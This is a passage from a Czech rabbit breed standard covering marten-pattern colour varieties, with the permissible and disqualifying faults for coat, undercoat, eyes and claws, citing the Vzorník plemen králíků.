Skvrny u pohlaví: tmavé. Barva očí: hnědá resp. šedomodrá, světélkující panenka. Drápy: tmavě rohovité. Oba rázy uznány ve světlém a středním odstínu.

Přípustné vady

Vzhled: celkově tmavší. Kuní znaky: méně výrazné, neplný hřbetní pruh, velká maska, která zatlačuje zrcadlo a skráňové skvrny. Mírně skvrnitý povrch těla, slabší melír, slabě znatelné oční kroužky. Ojedinělé bílé chloupky s výjimkou bílopesíkatých znaků. Oči a drápy: menší odstínové odchylky od stanovené barvy
Kubí – méně výrazné bílopesíkaté znaky, větší zátylkový klín bílý až šedobílý krycí chlup na prsou.

Nepřípustné vady

Zcela tmavá homozygotní zvířata (neklasifikován, chovu schopen). Silný rez (neklasifikován). Srst: silně promísená bílými chloupky, skupiny u Ku, u KuBí na povrchu těla (výluka). Kuní znaky: chybějící u světlých a středně světlých zvířat (výluka). Jiná než než bílá barva bílopesíkatého znaku (vydří, tříslové zb.) nebo nevýrazné bílopesíkaté znaky (výluka). Oči: jiná barva a dráp: bílý (vždy výluka).

Pozice 6. – Barva podsady
Barva podsady: v souladu s barvou krycího chlupu. Světlá místa – světlá, tmavé kuní znaky – tmavé. KuBíh a KuBím Barva podsady: KuBím: Tmavší místa – šedomodrá, světlejší místa – světle šedomodrá.
KuBíh: povrch těla – světle sépiově hnědá, břicho – hnědá až tříslová

Přípustné vady

Podsada: ojedinělé bílé chloupky, menší nesoulad se zbarvením krycího chlupu.

Nepřípustné vady

Podsada: silně promísená bílými chloupky (výluka), výrazná mezibarva, šedobílá až bílá u Ku (výluka).

Pozice 7. – Péče a zdraví
viz. všeobecná část

Zdroj standardu: Vzorník plemen králíků, (1997, 2003, 2020)